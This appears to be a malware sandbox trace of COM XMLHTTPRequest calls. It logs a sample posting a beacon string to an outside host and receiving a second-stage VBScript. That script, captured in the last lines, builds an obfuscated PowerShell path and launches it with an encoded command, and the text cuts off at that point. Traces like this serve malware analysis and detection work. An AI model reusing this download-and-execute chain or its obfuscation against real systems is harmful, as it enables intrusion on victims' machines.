	[0057.635] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0057.635] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0057.635] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0057.635] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0057.635] XMLHTTPRequest:IUnknown:Release (This=0x42ef20) returned 0x3
	[0057.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0057.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0057.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x42ef20) returned 0x0
	[0057.635] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0057.636] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0057.636] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0057.636] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0057.636] XMLHTTPRequest:IUnknown:Release (This=0x42ef20) returned 0x3
	[0057.636] XMLHTTPRequest:IUnknown:Release (This=0x42ef20) returned 0x2
	[0057.636] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x42ef20) returned 0x0
	[0057.636] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0057.636] XMLHTTPRequest:IUnknown:Release (This=0x42ef20) returned 0x2
	[0057.636] XMLHTTPRequest:IUnknown:Release (This=0x47a5b08) returned 0x0
	[0057.636] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0057.636] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0057.636] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0057.636] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0057.636] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0057.636] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0057.636] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0057.639] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0057.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0057.639] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0059.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0059.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0059.887] XMLHTTPRequest:IUnknown:AddRef (This=0x42ef20) returned 0x2
	[0059.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x42ef20) returned 0x0
	[0059.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x42ef20) returned 0x0
	[0059.887] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0059.887] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0059.887] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0059.887] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0059.887] XMLHTTPRequest:IUnknown:Release (This=0x42ef20) returned 0x3
	[0059.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0059.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0059.888] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x42ef20) returned 0x0
	[0059.888] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0059.888] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0059.888] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0059.888] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0059.888] XMLHTTPRequest:IUnknown:Release (This=0x42ef20) returned 0x3
	[0059.888] XMLHTTPRequest:IUnknown:Release (This=0x42ef20) returned 0x2
	[0059.888] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x42ef20) returned 0x0
	[0059.888] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0059.888] XMLHTTPRequest:IUnknown:Release (This=0x42ef20) returned 0x2
	[0059.889] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0059.889] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0059.889] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0059.889] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0059.889] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0059.889] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0059.896] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x42ef20) returned 0x0
	[0059.896] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x132158 | out: ppvObject=0x132158*=0x0) returned 0x80004002
	[0059.896] XMLHTTPRequest:IUnknown:Release (This=0x42ef20) returned 0x2
	[0060.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x42ef20, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x42ef20) returned 0x0
	[0060.825] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x42ef20, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x133a68 | out: ppvObject=0x133a68*=0x0) returned 0x80004002
	[0060.825] XMLHTTPRequest:IUnknown:Release (This=0x42ef20) returned 0x2
	[0076.695] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0076.695] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0076.695] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0076.695] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0076.695] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0076.695] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Dim golovs, powernols, masnoslo, nilops\r\nset winsh = CreateObject(\"WScript.Shell\")\r\nset winenv = winsh.Environment(\"Process\")\r\nwindir = winenv(\"WINDIR\")\r\nset Firraryuq2 = CreateObject(\"shell.application\")\r\nmasnoslo = windir+\"\\SysWOW64\\WindowsPowerS\"&\"hell\\v1.0\\power\"&\"she\"&\"ll\"\r\nnilops = 0\r\nFirraryuq2.ShellExecute masnoslo, \" -EnC 